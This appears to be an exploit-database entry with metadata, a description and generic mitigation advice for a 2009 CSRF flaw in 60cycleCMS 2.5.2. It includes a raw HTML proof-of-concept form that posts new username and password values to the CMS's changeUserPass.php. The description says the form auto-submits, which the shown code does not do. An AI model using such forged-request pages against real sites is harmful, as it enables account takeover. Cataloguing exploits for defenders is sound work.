60 cycleCMS V 2.5.2 CSRF Change Username & Password Exploit

vendor:

60cycleCMS

by:

EL-KAHINA

8,8

CVSS

HIGH

CSRF

352

CWE

Product Name: 60cycleCMS

Affected Version From: 2.5.2

Affected Version To: 2.5.2

Patch Exists: Yes

Related CWE: N/A

CPE: 60cycleCMS

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux

2009

60 cycleCMS V 2.5.2 CSRF Change Username & Password Exploit

This exploit allows an attacker to change the username and password of a 60 cycleCMS V 2.5.2 system by using a CSRF attack. The attacker can craft a malicious HTML page that contains a form with the desired username and password fields. When the victim visits the malicious page, the form will be automatically submitted and the username and password will be changed.

Mitigation:

The best way to mitigate CSRF attacks is to use a combination of server-side and client-side validation. Server-side validation should be used to verify that the request is coming from a trusted source. Client-side validation should be used to ensure that the request is valid and not malicious. Additionally, the use of anti-CSRF tokens can help to prevent CSRF attacks.

Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : 60 cycleCMS V 2.5.2 CSRF Change Username & Password Exploit
| # Author   : EL-KAHINA                                                                                                                 
| # Home     : www.iqs3cur1ty.com/vb     
| # Web Site : http://php.opensourcecms.com/scripts/details.php?scriptid=337                                                                            
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : CSRF                                                                      
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
<html>
<body>
<h2>Change Username or Password</h2>
<p>Enter desired username and password.</p>
<form action="http://127.0.0.1/60cycleCMS.2.5.2/private/changeUserPass.php" method="post" name="changeUserPass">
Desired Username: <input name="user" type="text" /><br />
Desired Password: <input name="pass" type="password"/><br />
Confirm Desired Password: <input name="passConfirm" type="password"/><br />
<input type="button" value="Submit" onclick="checkForm(this.form)" />
</form>
</body>
</html>
 
==========================================
Greetz : Exploit-db Team 
all my friend :(Dz-Ghost Team ) 
im indoushka's sister
------------------------------------------